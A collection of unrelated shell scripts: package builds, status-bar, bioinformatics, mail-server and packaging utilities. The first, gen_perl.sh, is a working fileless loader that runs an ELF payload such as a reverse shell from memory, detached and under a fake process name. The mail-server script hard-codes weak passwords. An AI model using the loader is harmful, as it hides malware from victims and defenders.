20f2c1660153b3f206e1999c63e2e31c671b7ea4 | Shell | purpleroc/gen_perl | /gen_perl.sh | UTF-8 | 996 | 3.09375 | 3 | [] | no_license | #!/bin/sh
if [ 3 -ne $# ]; then
echo "Usage: ./gen_perl.sh [elf] [xx.pl] [proc_name]"
echo "eg: ./gen_perl.sh reverse_tcp hack.pl hackers"
exit 0
fi

# Prologue: create an anonymous in-memory file via the memfd_create
# syscall (319 on x86-64) and open an unbuffered write handle on it.
echo "my \$name = \"\";
my \$fd = syscall(319, \$name, 1);
if (-1 == \$fd) {
die \"memfd_create: $!\";
}
open(my \$FH, '>&='.\$fd) or die \"open: \$!\";
select((select(\$FH), $|=1)[0]);
" > $2

# Append the ELF payload ($1) as pack'd hex chunks, 32 bytes per print.
perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./$1 >> $2

# Epilogue: double-fork + setsid to detach from the terminal, then exec
# the in-memory file under the fake process name given as argv[3].
echo '
# Spawn child
my $pid = fork();
if (-1 == $pid) { # Error
die "fork1: $!";
}
if (0 != $pid) { # Parent terminates
exit 0;
}
# In the child, become session leader
if (-1 == syscall(112)) {
die "setsid: $!";
}
# Spawn grandchild
$pid = fork();
if (-1 == $pid) { # Error
die "fork2: $!";
}
if (0 != $pid) { # Child terminates
exit 0;
}
exec {"/proc/$$/fd/$fd"} "'${3}'" or die "exec: $!";
' >> $2
| true |
934213bf7b83e70bb51684bef76efd709db8e48e | Shell | delkyd/alfheim_linux-PKGBUILDS | /haskell-curl/PKGBUILD | UTF-8 | 1,720 | 2.75 | 3 | [] | no_license | # Maintainer: Carsten Feuls <archlinux@carstenfeuls.de>
# Generated by hkg2arch --> https://github.com/christopherloen/hkg2arch
hkgname=curl
pkgname=haskell-curl
pkgrel=1
pkgver=1.3.8
pkgdesc='Haskell binding to libcurl'
arch=(any)
url='http://hackage.haskell.org/package/curl'
license=(BSD3)
depends=('ghc' 'haskell-base' 'haskell-bytestring' 'haskell-containers')
options=(strip)
source=(https://hackage.haskell.org/package/${hkgname}-${pkgver}/${hkgname}-${pkgver}.tar.gz)
sha256sums=('9087c936bfcdb865bad3166baa3f12bf37acf076fa76010e3b5f82a1d485446e')

# Configure the cabal build for the standard Arch Haskell layout
# (shared libs, dynamic executables, docs under /usr/share/doc).
prepare() {
  cd ${srcdir}/${hkgname}-${pkgver}
  # NOTE(review): the -f-no-unicode/-f-system-libyaml/-f-no-exe/-fno-examples
  # flags come from the hkg2arch template - confirm they correspond to
  # cabal flags that this particular package actually defines.
  runhaskell Setup.hs configure -O --enable-shared --enable-executable-dynamic \
    --prefix=/usr --docdir="/usr/share/doc/${pkgname}" \
    --dynlibdir=/usr/lib --libsubdir=\$compiler/site-local/\$pkgid \
    -f-no-unicode -f-system-libyaml -f-no-exe -fno-examples
}

# Build the library, its haddock docs, and the ghc-pkg (un)register scripts.
build() {
  cd ${srcdir}/${hkgname}-${pkgver}
  runhaskell Setup build
  runhaskell Setup haddock
  runhaskell Setup register --gen-script
  runhaskell Setup unregister --gen-script
  # Force unregistration even if dependents exist.
  sed -i -r -e "s|ghc-pkg.*unregister[^ ]* |&'--force' |" unregister.sh
}

# Install the library plus register hooks, docs symlink, and license.
package() {
  cd ${srcdir}/${hkgname}-${pkgver}
  install -D -m744 register.sh "${pkgdir}/usr/share/haskell/register/${pkgname}.sh"
  install -D -m744 unregister.sh "${pkgdir}/usr/share/haskell/unregister/${pkgname}.sh"
  install -d -m755 ${pkgdir}/usr/share/doc/ghc/html/libraries
  ln -s /usr/share/doc/${pkgname}/html ${pkgdir}/usr/share/doc/ghc/html/libraries/${hkgname}
  runhaskell Setup copy --destdir=${pkgdir}
  install -D -m644 LICENSE ${pkgdir}/usr/share/licenses/${pkgname}/LICENSE
  rm -f ${pkgdir}/usr/share/doc/${pkgname}/LICENSE
}
| true |
d587c1c5408fad422af11e96372f0fcd93b2f97d | Shell | fajarrasyid/dotfiles | /.local/bin/status-bar/battery | UTF-8 | 823 | 3.0625 | 3 | [
"MIT"
] | permissive | #! /bin/sh
# Read the battery charge percentage (0-100) from sysfs.
bat=$(cat /sys/class/power_supply/BAT0/capacity)
# NOTE(review): "status" is read but never used below - confirm whether
# a charging indicator was intended.
status=$(cat /sys/class/power_supply/BAT0/status)
ramp10=
ramp20=
ramp30=
ramp40=
ramp50=
ramp60=
ramp70=
ramp80=
ramp90=
ramp100=
# Pick the icon for the charge decile and print it with the percentage.
# Same mapping as the original if/elif ladder: 0-9 -> ramp10,
# 10-19 -> ramp20, ..., 80-89 -> ramp90, 90-100 -> ramp100.
ramps=("$ramp10" "$ramp20" "$ramp30" "$ramp40" "$ramp50" \
       "$ramp60" "$ramp70" "$ramp80" "$ramp90" "$ramp100" "$ramp100")
if [ "$bat" -le 100 ]; then
	echo " ${ramps[bat / 10]} $bat% "
fi
| true |
3e9435d254ac0886bdadefc02bc033af934b46d9 | Shell | hilldr/STM_dual_rnaseq | /src/download_genomes.sh | UTF-8 | 1,278 | 2.8125 | 3 | [] | no_license | #! /bin/bash
## script to download and index bacterial genomes
## for RNA-seq alignment in kallisto
## DAVID R. HILL
## -----------------------------------------------------------------------------
## make directory for genomes
mkdir -p ../data/genomes

## Salmonella enterica subsp. enterica serovar Enteritidis str. P125109
## GenBank: AM933172.1
rsync --copy-links --times --verbose rsync://ftp.ncbi.nlm.nih.gov/genomes/refseq/bacteria/Salmonella_enterica/latest_assembly_versions/GCF_000009505.1_ASM950v1/GCF_000009505.1_ASM950v1_cds_from_genomic.fna.gz ../data/genomes

## Salmonella enterica Subsp. enterica serovar Typhi Ty2
## Genbank: AE014613.1
rsync --copy-links --times --verbose rsync://ftp.ncbi.nlm.nih.gov/genomes/refseq/bacteria/Salmonella_enterica/latest_assembly_versions/GCF_000007545.1_ASM754v1/GCF_000007545.1_ASM754v1_cds_from_genomic.fna.gz ../data/genomes

## Salmonella enterica Subsp. enterica serovar Typhimurium SL1344
## GenBank: FQ312003.1
rsync --copy-links --times --verbose rsync://ftp.ncbi.nlm.nih.gov/genomes/refseq/bacteria/Salmonella_enterica/latest_assembly_versions/GCF_000210855.2_ASM21085v2/GCF_000210855.2_ASM21085v2_cds_from_genomic.fna.gz ../data/genomes

## build a kallisto index next to each downloaded CDS fasta
for file in ../data/genomes/*.fna.gz
do
    ## BUGFIX: guard against an unmatched glob, which would otherwise
    ## pass the literal pattern "../data/genomes/*.fna.gz" to kallisto.
    [ -e "$file" ] || continue
    kallisto index -i "$file".idx "$file"
done
| true |
0e6f6b32009838e82b8800bc6ecb14f59d40d447 | Shell | Guillem96/hollow-knight-nx-skin-converter | /generate-skins.sh | UTF-8 | 994 | 3.8125 | 4 | [] | no_license | #!/bin/bash
GAMEID=0100633007D48000
RELEASEDIR=release

# Pass 1: convert every txt-pack into a skin under $RELEASEDIR.
counter=1
nSkins=$(ls -1 txt-packs/ | wc -l)
for skinPath in txt-packs/* ; do
    echo "-- Generate skins [${counter}/${nSkins}] ----------------------------"
    python hk-skin-nx.py \
        --dump-path ${GAMEID} \
        --skin "${skinPath}" --output ${RELEASEDIR}
    counter=$((counter+1))
done

counter=1
# Pass 2: zip each generated skin.
# Move to an "isolated area" so zip compressed files have the desired name
cwd=$(pwd)
ls -1 -d ${cwd}/${RELEASEDIR}/* | while read skinPath; do
    # BUGFIX: return to the original directory first; the "cd" below
    # persists across loop iterations, so from the second skin onward
    # the relative mkdir/cd used to run from inside ${RELEASEDIR}/tmp.
    cd "${cwd}"
    mkdir -p ${RELEASEDIR}/tmp/${GAMEID}/romfs
    cd ${RELEASEDIR}/tmp/
    echo "-- Compressing skins [${counter}/${nSkins}] -------------------------"
    zipFileName=$(echo ${skinPath} | tr -s '[:blank:]' '_')
    # BUGFIX: start from a clean ${GAMEID} tree; "cp -r" into an
    # existing directory merged every previous skin's romfs into the
    # later zips.
    rm -rf ${GAMEID}
    # Copy the needed files to the current working directory
    mkdir -p ${GAMEID}
    cp -r "${skinPath}/${GAMEID}/romfs" ${GAMEID}
    # Zip Game id folder
    zip -r ${zipFileName}.zip "${GAMEID}/"
    counter=$((counter+1))
done
rm -rf ${RELEASEDIR}/tmp
b218c1c6ac23331553e931d3eee5abeb6115f982 | Shell | google-code/android-io-model | /samsung/app/Facebook/plot.sh | UTF-8 | 851 | 2.875 | 3 | [] | no_license |
# For every dataset named in dat_list, regenerate the five per-workload
# PDFs and combine them into a single 2x3 summary page.
for dat_file in `cat dat_list`
do
#io type: overall I/O-type breakdown plot
./plot_io_type.sh
mv io_type.pdf ${dat_file}_io_type.pdf
# random read: config logs matching *2_35_35.expected, series index 0
ls --color=none|grep config_log_|grep 2_35_35.expected|python plot2.py $dat_file 0 4 random_read
mv tmp.pdf ${dat_file}_rr.pdf
# random write: config logs matching config_log_1_*35_35.expected, index 1
ls --color=none|grep config_log_1_|grep 35_35.expected|python plot2.py $dat_file 1 4 random_write
mv tmp.pdf ${dat_file}_rw.pdf
# sequential read: config_log_1_2_*35.expected, index 2
ls --color=none|grep config_log_1_2_|grep 35.expected|python plot2.py $dat_file 2 4 seq_read
mv tmp.pdf ${dat_file}_sr.pdf
# sequential write: config_log_1_2_35_*, index 3
ls --color=none|grep config_log_1_2_35_|python plot2.py $dat_file 3 4 seq_write
mv tmp.pdf ${dat_file}_sw.pdf
# combine the five plots into one 2x3 page per dataset
pdfnup --no-tidy --nup 2x3 ${dat_file}_io_type.pdf ${dat_file}_rr.pdf ${dat_file}_rw.pdf ${dat_file}_sr.pdf ${dat_file}_sw.pdf
mv ${dat_file}_sw-nup.pdf ${dat_file}_2x3.pdf
done
| true |
9347c6bb69194bfd79168efd21676e79ab468c36 | Shell | delkyd/alfheim_linux-PKGBUILDS | /enigma_sdl/PKGBUILD | UTF-8 | 1,066 | 2.65625 | 3 | [] | no_license | # Contributor: Nagy Gabor <Gabor.V.Nagy@@gmail.com>
pkgname=enigma_sdl
pkgver=1.21
pkgrel=2
pkgdesc="Puzzle game inspired by Oxyd on the Atari ST and Rock'n'Roll on the Amiga."
url="http://www.nongnu.org/enigma/"
depends=('libpng' 'sdl_image' 'sdl_mixer' 'sdl_ttf' 'xerces-c' 'xdg-utils' 'curl')
makedepends=('imagemagick')
source=(http://downloads.sourceforge.net/enigma-game/enigma-$pkgver.tar.gz
        std-gnu03.patch)
sha256sums=('d872cf067d8eb560d3bb1cb17245814bc56ac3953ae1f12e2229c8eb6f82ce01'
            'a606faf8f2f55c08a9a49a6ec8bce764422b749bb458733a27aba8cb2cf6b78e')
license=('GPL')
arch=('i686' 'x86_64')

# Patch for modern compilers, then configure with the _sdl program
# suffix so this package can coexist with a plain "enigma" install.
build() {
  cd $srcdir/enigma-$pkgver
  patch -Np1 -i $srcdir/std-gnu03.patch
  autoconf
  ./configure --prefix=/usr --program-suffix=_sdl --sysconfdir=/etc --disable-sdltest --enable-optimize
  make
}

package(){
  cd $srcdir/enigma-$pkgver
  make DESTDIR=$pkgdir install
  # removing enet files to avoid file conflicts
  rm -R $pkgdir/usr/include/
  rm -R $pkgdir/usr/lib/
  # Point the desktop entry at the suffixed binary.
  sed -i s/Exec=enigma/Exec=enigma_sdl/ $pkgdir/usr/share/applications/enigma.desktop
}
| true |
7386aa6431bdb644d22f6c69e9bfa7c85f0bf641 | Shell | wonview/software-mac | /software-mac/6051.Q0.1007.04.000000/host_drivers/Linux/ssv6xxx/script/.svn/text-base/pack.svn-base | UTF-8 | 1,395 | 3.625 | 4 | [
"ISC"
] | permissive | #!/bin/bash
# Pack the driver sources: strip comments from every .c/.h file, prepend
# the license header, reformat to Linux style, and copy Makefiles,
# scripts and firmware images into $TARGET_DIR.
TARGET_DIR=pack
rm -rf $TARGET_DIR

src_c=`find . -name "*.c"`
src_h=`find . -name "*.h"`
src_mk=`find . \( -name Makefile -o -name "*.mak" \)`

mkdir -p /tmp/pack > /dev/null

# Process each source code in .c and .h.
for src in $src_c $src_h; do
  mkdir -p "/tmp/pack/`dirname $src`" > /dev/null
  echo "Processing $src..."
  dir="$TARGET_DIR/`dirname $src`"
  src_name="`basename $src`"
  if [ ! -d $dir ]; then
    mkdir -p $dir
  fi
  # Write the license header first, then strip comments with the
  # preprocessor and reformat the result.
  cat script/license.txt > "$dir/$src_name"
  gcc -fpreprocessed -dD -E -P -std=gnu99 $src > /tmp/pack/$src
  #cat /tmp/pack/$src | \
  #indent -bad -bap -bbb -nbc -bbo -hnl -br -brs -c33 -cd33 -ncdb -ce -ci4 \
  #-cli0 -d0 -di1 -nfc1 -i8 -ip0 -l80 -lp -npcs -nprs -npsl -sai \
  #-saf -saw -ncs -nsc -sob -nfca -cp33 -ss -ts8 -il1 /tmp/pack/$src -o "$dir/$src_name"
  # BUGFIX: append (>>) instead of truncating (>); the old redirection
  # overwrote the license header written just above.
  clang-format-3.4 -style='{BasedOnStyle: LLVM, UseTab: Always, IndentWidth: 8, BreakBeforeBraces: Linux, AllowShortIfStatementsOnASingleLine: false, IndentCaseLabels: false}' \
  /tmp/pack/$src >> "$dir/$src_name"
  #$src | script/stripcmt > "$dir/$src_name"
done

# Copy every Makefile
for src in $src_mk; do
  cp $src "$TARGET_DIR/$src"
done

# No firmware code
rm -rf "$TARGET_DIR/ssv6200smac/firmware"

# Copy scripts and FW image
cp -r image script *.sh $TARGET_DIR
| true |
b9c668855c7d49f51751bdf7282fbe196da930d0 | Shell | ekmixon/eclipsefuro | /furo/template/scripts/gprcgateway/generate.sh | UTF-8 | 286 | 2.640625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
out_dir=pkg/grpc-gateway
mkdir -p "$out_dir"

# Render the gRPC-gateway service registration from the furo spec.
furo exportAsYaml | simple-generator -t scripts/gprcgateway/autoregister.go.tpl > "$out_dir"/autoregister.go

# Normalize formatting of the generated Go source.
go fmt "$out_dir"/autoregister.go
echo "gateway sources generated"
92664e93e1df3142d58c9723c65f941d6ca4dfcd | Shell | tiborsimon/dotfiles | /configs/git/scripts/git-checkown.bash | UTF-8 | 309 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -e

# Interactively check out one of your own branches: list refs authored
# by the configured git user (newest first), strip the ref prefixes,
# and let fzy pick one.
user=$(git config user.name)
branch=$(git for-each-ref --format='%(authorname)=%(refname)' --sort=-authordate |
            grep -i "$user" |
            cut -d'=' -f2 |
            sed 's%refs/heads/%%' |
            sed 's%refs/remotes/origin/%%' |
            awk '!seen[$0]++' |
            fzy)

# BUGFIX: "uniq" only collapses *adjacent* duplicates, but the list is
# sorted by author date, so the local and remote copy of a branch were
# usually not adjacent; awk '!seen[$0]++' dedupes globally while
# preserving order.
if [ -n "$branch" ]
then
    git checkout "$branch"
fi
| true |
d994a17049f730d048c1ea72075561d4643dc72c | Shell | yuksbg/easymail | /init.sh | UTF-8 | 12,257 | 3.015625 | 3 | [] | no_license | #BASIC
CURRENT_DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
# What I have to improve in this script.
# Collect all password in one place in the beginning.
# Collect all hostname in one place in the beginning.
# Configure SpamAssassin
# Make satisfaction way for certificate.
# Roundube password can not be changed must be fixed.
##################
# Specific for Docker
#/usr/sbin/dovecot
#service postfix status
#service mysql start
##################
# Example for Docker
# apt-get update && apt-get install docker.io -y
# docker run -it -p=110:110 -p=25:25 -p=995:995 -p=8080:80 -p=587:587 -p=993:993 -p=143:143 -h cursedly-host.gzeki.com --name="email_server" ubuntu:14.04 /bin/sh -c "if [ -f /run.sh ]; then bash /run.sh; fi; exec /bin/bash"
###################
debconf-set-selections <<< 'mysql-server mysql-server/root_password password YOUR_PASSWORD'
debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password YOUR_PASSWORD'
debconf-set-selections <<< "postfix postfix/mailname string cursedly-host.gzeki.com"
debconf-set-selections <<< "postfix postfix/main_mailer_type string 'Internet Site'"
debconf-set-selections <<< "dovecot-core dovecot-core/ssl-cert-exists string error"
debconf-set-selections <<< "dovecot-core dovecot-core/ssl-cert-name string localhost"
debconf-set-selections <<< "dovecot-core dovecot-core/create-ssl-cert boolean true"
apt-get update && apt-get install expect postfix postfix-mysql dovecot-core dovecot-imapd dovecot-pop3d dovecot-lmtpd dovecot-mysql mysql-server -y
mysql_install_db
expect -c "
set timeout 10
spawn mysql_secure_installation
expect \"Enter current password for root (enter for none):\"
send \"YOUR_PASSWORD\r\"
expect \"Change the root password?\"
send \"n\r\"
expect \"Remove anonymous users?\"
send \"y\r\"
expect \"Disallow root login remotely?\"
send \"y\r\"
expect \"Remove test database and access to it?\"
send \"y\r\"
expect \"Reload privilege tables now?\"
send \"y\r\"
expect eof"
mysqladmin -uroot -pYOUR_PASSWORD create mailserver
mysql -uroot -pYOUR_PASSWORD << EOF
GRANT SELECT ON mailserver.* TO 'mailuser'@'127.0.0.1' IDENTIFIED BY 'mailuserpass';
FLUSH PRIVILEGES;
USE mailserver;
CREATE TABLE \`virtual_domains\` (
\`id\` int(11) NOT NULL auto_increment,
\`name\` varchar(50) NOT NULL,
PRIMARY KEY (\`id\`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE \`virtual_users\` (
\`id\` int(11) NOT NULL auto_increment,
\`domain_id\` int(11) NOT NULL,
\`password\` varchar(106) NOT NULL,
\`email\` varchar(100) NOT NULL,
PRIMARY KEY (\`id\`),
UNIQUE KEY \`email\` (\`email\`),
FOREIGN KEY (domain_id) REFERENCES virtual_domains(id) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE \`virtual_aliases\` (
\`id\` int(11) NOT NULL auto_increment,
\`domain_id\` int(11) NOT NULL,
\`source\` varchar(100) NOT NULL,
\`destination\` varchar(100) NOT NULL,
PRIMARY KEY (\`id\`),
FOREIGN KEY (domain_id) REFERENCES virtual_domains(id) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO \`mailserver\`.\`virtual_domains\` (\`id\` ,\`name\`)
VALUES('1', 'cursedly-host.gzeki.com');
INSERT INTO \`mailserver\`.\`virtual_users\` (\`id\`, \`domain_id\`, \`password\` , \`email\`)
VALUES ('1', '1', '\$1\$pfhfftkU\$3/0sv66/HiM0Dn6l3qRiq/', 'admin@cursedly-host.gzeki.com');
# This password $1$pfhfftkU$3/0sv66/HiM0Dn6l3qRiq/ IS 123456
# note must escape \$ in that way in linux EOP
INSERT INTO \`mailserver\`.\`virtual_aliases\` (\`id\`, \`domain_id\`, \`source\`, \`destination\`)
VALUES('1', '1', 'alias@cursedly-host.gzeki.com', 'admin@cursedly-host.gzeki.com');
EOF
cp /etc/postfix/main.cf /etc/postfix/main.cf.orig
postconf -e mydestination=localhost
postconf -# smtpd_tls_session_cache_database
postconf -# smtp_tls_session_cache_database
postconf -e smtpd_tls_cert_file=/etc/dovecot/dovecot.pem
postconf -e smtpd_tls_key_file=/etc/dovecot/private/dovecot.pem
postconf -e smtpd_use_tls=yes
postconf -e smtpd_tls_auth_only=yes
postconf -e smtpd_sasl_type=dovecot
postconf -e smtpd_sasl_path=private/auth
postconf -e smtpd_sasl_auth_enable=yes
postconf -e smtpd_recipient_restrictions=permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination
postconf -e virtual_transport=lmtp:unix:private/dovecot-lmtp
postconf -e virtual_mailbox_domains=mysql:/etc/postfix/mysql-virtual-mailbox-domains.cf
postconf -e virtual_mailbox_maps=mysql:/etc/postfix/mysql-virtual-mailbox-maps.cf
postconf -e virtual_alias_maps=mysql:/etc/postfix/mysql-virtual-alias-maps.cf
echo "
user = mailuser
password = mailuserpass
hosts = 127.0.0.1
dbname = mailserver
query = SELECT 1 FROM virtual_domains WHERE name='%s'
" > /etc/postfix/mysql-virtual-mailbox-domains.cf
echo "
user = mailuser
password = mailuserpass
hosts = 127.0.0.1
dbname = mailserver
query = SELECT 1 FROM virtual_users WHERE email='%s'
" > /etc/postfix/mysql-virtual-mailbox-maps.cf
echo "
user = mailuser
password = mailuserpass
hosts = 127.0.0.1
dbname = mailserver
query = SELECT destination FROM virtual_aliases WHERE source='%s'
" > /etc/postfix/mysql-virtual-alias-maps.cf
cp /etc/postfix/master.cf /etc/postfix/master.cf.orig
cp /etc/dovecot/dovecot.conf /etc/dovecot/dovecot.conf.orig
cp /etc/dovecot/conf.d/10-mail.conf /etc/dovecot/conf.d/10-mail.conf.orig
cp /etc/dovecot/conf.d/10-auth.conf /etc/dovecot/conf.d/10-auth.conf.orig
cp /etc/dovecot/dovecot-sql.conf.ext /etc/dovecot/dovecot-sql.conf.ext.orig
cp /etc/dovecot/conf.d/10-master.conf /etc/dovecot/conf.d/10-master.conf.orig
cp /etc/dovecot/conf.d/10-ssl.conf /etc/dovecot/conf.d/10-ssl.conf.orig
echo "
#Automatic added by script for auto install mail server.
smtps inet n - - - - smtpd
submission inet n - - - - smtpd
-o smtpd_tls_security_level=encrypt
-o smtpd_sasl_auth_enable=yes
-o smtpd_client_restrictions=permit_sasl_authenticated,reject
" >> /etc/postfix/master.cf
echo "
#Automatic added by script for auto install mail server.
protocols = imap pop3 lmtp
" >> /etc/dovecot/dovecot.conf
sed -i "s/mail_location = .*/mail_location = maildir:\/var\/mail\/vhosts\/%d\/\%n/g" /etc/dovecot/conf.d/10-mail.conf
sed -i "s/#mail_privileged_group =/mail_privileged_group = mail/g" /etc/dovecot/conf.d/10-mail.conf
mkdir -p /var/mail/vhosts/cursedly-host.gzeki.com
groupadd -g 5000 vmail
useradd -g vmail -u 5000 vmail -d /var/mail
chown -R vmail:vmail /var/mail
sed -i "s/^#disable_plaintext_auth = .*/disable_plaintext_auth = yes/g" /etc/dovecot/conf.d/10-auth.conf
sed -i "s/^auth_mechanisms = .*/auth_mechanisms = plain login/g" /etc/dovecot/conf.d/10-auth.conf
sed -i "s/\!include auth-system.conf.ext/#\!include auth-system.conf.ext/g" /etc/dovecot/conf.d/10-auth.conf
sed -i "s/#\!include auth-sql.conf.ext/\!include auth-sql.conf.ext/g" /etc/dovecot/conf.d/10-auth.conf
sed -i "s/#ssl = .*/ssl = required/g" /etc/dovecot/conf.d/10-ssl.conf
echo '
passdb {
driver = sql
args = /etc/dovecot/dovecot-sql.conf.ext
}
userdb {
driver = static
args = uid=vmail gid=vmail home=/var/mail/vhosts/%d/%n
}
' > /etc/dovecot/conf.d/auth-sql.conf.ext
echo "
driver = mysql
connect = host=127.0.0.1 dbname=mailserver user=mailuser password=mailuserpass
default_pass_scheme = CRYPT
password_query = SELECT email as user, password FROM virtual_users WHERE email='%u';
" >> /etc/dovecot/dovecot-sql.conf.ext
chown -R vmail:dovecot /etc/dovecot
chmod -R o-rwx /etc/dovecot
cp $CURRENT_DIR/10-master.conf /etc/dovecot/conf.d/10-master.conf
service dovecot restart
service postfix restart
# INSTALL Roundcube and all its dependences
apt-get install nginx php5-fpm php5-mcrypt php5-intl php5-mysql -y
rm -r /etc/nginx/sites-enabled/*
cp $CURRENT_DIR/nginx_config_for_roundcube /etc/nginx/sites-enabled/roundcube
cd /tmp && wget http://netcologne.dl.sourceforge.net/project/roundcubemail/roundcubemail/1.1.1/roundcubemail-1.1.1-complete.tar.gz
tar -xvzf roundcubemail-1.1.1-complete.tar.gz
mkdir /usr/share/roundcubemail
cp -r roundcubemail-1.1.1/ /usr/share/nginx/roundcubemail
cd /usr/share/nginx/roundcubemail/
sed -i "s/;cgi.fix_pathinfo=.*/cgi.fix_pathinfo=0/" /etc/php5/fpm/php.ini
mysqladmin -uroot -pYOUR_PASSWORD create roundcube
mysql -uroot -pYOUR_PASSWORD << EOF
GRANT SELECT ON roundcube.* TO 'roundcube'@'127.0.0.1' IDENTIFIED BY '';
GRANT EXECUTE, SHOW VIEW, ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE VIEW, DELETE, DROP, EVENT, INDEX, INSERT, REFERENCES, TRIGGER, UPDATE, LOCK TABLES ON roundcube.* TO 'roundcube'@'127.0.0.1' IDENTIFIED BY 'YOUR_PASSWORD';
GRANT SELECT, UPDATE ON mailserver.* TO 'roundcube'@'127.0.0.1';
FLUSH PRIVILEGES;
USE roundcube;
EOF
chmod -R 644 /usr/share/nginx/roundcubemail/temp /usr/share/nginx/roundcubemail/logs
cp $CURRENT_DIR/roundcube_config /usr/share/nginx/roundcubemail/config/config.inc.php
mysql -uroot -pYOUR_PASSWORD roundcube < /usr/share/nginx/roundcubemail/SQL/mysql.initial.sql
rm -r /usr/share/nginx/roundcubemail/installer
cd /usr/share/nginx/roundcubemail/plugins/password/
cp config.inc.php.dist config.inc.php
sed -i "s/<?php/<?php \n # PLEASE READ ME \n #Some array values are overwritten in the end of this file!/" config.inc.php
echo `cat $CURRENT_DIR/roundcube_password_plugin_config` >> /usr/share/nginx/roundcubemail/config/config.inc.php
service php5-fpm restart
service nginx reload
# Install autoconfig and autodiscover
mkdir /usr/share/nginx/autoconfig_and_autodiscover
cp $CURRENT_DIR/autoconfig.php /usr/share/nginx/autoconfig_and_autodiscover/
cp $CURRENT_DIR/autodiscover.php /usr/share/nginx/autoconfig_and_autodiscover/
cp $CURRENT_DIR/nginx_config_for_autoconfig_and_autodiscover /etc/nginx/sites-enabled/autoconfig_and_autodiscover
# Install SpamAssassin
apt-get install spamassassin spamc -y
groupadd spamd
useradd -g spamd -s /bin/false -d /var/log/spamassassin spamd
mkdir /var/log/spamassassin
chown spamd:spamd /var/log/spamassassin
cp /etc/default/spamassassin /etc/default/spamassassin.orig
sed -i "s/ENABLED=0/ENABLED=1/" /etc/default/spamassassin
sed -i "s/CRON=0/CRON=1/" /etc/default/spamassassin
# Clean version
# SAHOME="/var/log/spamassassin/"
# OPTIONS="--create-prefs --max-children 2 --username spamd -H ${SAHOME} -s ${SAHOME}spamd.log"
sed -i "s/OPTIONS=.*/SAHOME=\"\/var\/log\/spamassassin\/\"\nOPTIONS=\"--create-prefs --max-children 2 --username spamd -H \${SAHOME} -s \${SAHOME}spamd.log\"/" /etc/default/spamassassin
# ADD "-o content_filter=spamassassin" AFTER smtp inet n - - - - smtpd
sed -i "s/smtp .* smtpd/smtp inet n - - - - smtpd\n -o content_filter=spamassassin/" /etc/postfix/master.cf
echo "
spamassassin unix - n n - - pipe
user=spamd argv=/usr/bin/spamc -f -e
/usr/sbin/sendmail -oi -f \${sender} \${recipient}
" >> /etc/postfix/master.cf
service postfix restart
service spamassassin restart
#Move spam message to spam folder
apt-get install dovecot-sieve dovecot-managesieved
echo "
protocol lmtp {
postmaster_address = admin@cursedly-host.gzeki.com
mail_plugins = $mail_plugins sieve
}
" >> /etc/dovecot/conf.d/20-lmtp.conf
echo "
plugin {
sieve = ~/.dovecot.sieve
sieve_global_path = /var/lib/dovecot/sieve/default.sieve
sieve_dir = ~/sieve
sieve_global_dir = /var/lib/dovecot/sieve/
}
" > /etc/dovecot/conf.d/90-sieve.conf
service dovecot restart
mkdir /var/lib/dovecot/sieve/
echo "
require \"fileinto\";
if header :contains \"X-Spam-Flag\" \"YES\" {
fileinto \"Junk\";
}
" > /var/lib/dovecot/sieve/default.sieve
chown -R vmail:vmail /var/lib/dovecot
sievec /var/lib/dovecot/sieve/default.sieve
# Tests
# Spamassassin
# Check your local.cf syntax
# spamassassin --lint
# tail -f /var/log/spamassassin/spamd.log
# Message with content XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X must always be spam.
# Postfix
# postmap -q admin@cursedly-host.gzeki.com mysql:/etc/postfix/mysql-virtual-mailbox-maps.cf must return 1
# postmap -q alias@cursedly-host.gzeki.com mysql:/etc/postfix/mysql-virtual-alias-maps.cf must return admin@cursedly-host.gzeki.com
# postmap -q cursedly-host.gzeki.com mysql:/etc/postfix/mysql-virtual-mailbox-domains.cf must return 1
# Debugging
# openssl passwd -1 123456 WORKING CUURECTLY
# openssl passwd -1 123456 = $1$pfhfftkU$3/0sv66/HiM0Dn6l3qRiq/
| true |
539ae850fbadbf28de889d392da04379d2084625 | Shell | tgm4883/streamdeck-settings | /DBD/scripts/stream-toggle.sh | UTF-8 | 533 | 2.90625 | 3 | [] | no_license | #!/bin/bash
# Load credentials (provides $obs_pass for obs-cli).
. ~/creds

# Toggle OBS between the "Game" and "Between Games" scenes for DBD streams,
# persisting the current state (GAMESTATE=INGAME|BETWEEN) across runs.
# The state-file path used to be repeated four times; hoist it once.
STATE_FILE="/home/thomas/Streaming/DBD/gamestate.txt"

# Restore the previous state; default to 'Start' on the very first run so
# the else-branch below shows the "Between Games" scene.
if test -f "$STATE_FILE"; then
	source "$STATE_FILE"
else
	GAMESTATE='Start'
fi

if [[ $GAMESTATE == 'BETWEEN' ]]
then
	# Break is over: switch back to gameplay.
	# BUG FIX: quote the password so it survives spaces/globs.
	/usr/bin/obs-cli scene switch "Game" --password "$obs_pass"
	echo "GAMESTATE='INGAME'" > "$STATE_FILE"
else
	# Game ended (or first run): refresh Twitch stats, show the break scene.
	/home/thomas/Streaming/Twitch/twitch-stats.sh
	/usr/bin/obs-cli scene switch "Between Games" --password "$obs_pass"
	echo "GAMESTATE='BETWEEN'" > "$STATE_FILE"
fi
| true |
8ed07d9470eeb6cfa13e5948e56ac28423a4f811 | Shell | dvnagesh/docker | /confluence/install-confluence.sh | UTF-8 | 974 | 2.65625 | 3 | [] | no_license | /usr/sbin/groupadd atlassian
# Create the service account (the "atlassian" group was created above) and
# install Confluence ${CONFLUENCE_VERSION} under /opt/confluence.
# BUG FIX: abort on the first failed step instead of carrying on and
# producing a half-broken install (e.g. untarring a failed download).
set -e
# Fail early with a clear message when the version was not provided.
: "${CONFLUENCE_VERSION:?CONFLUENCE_VERSION must be set}"
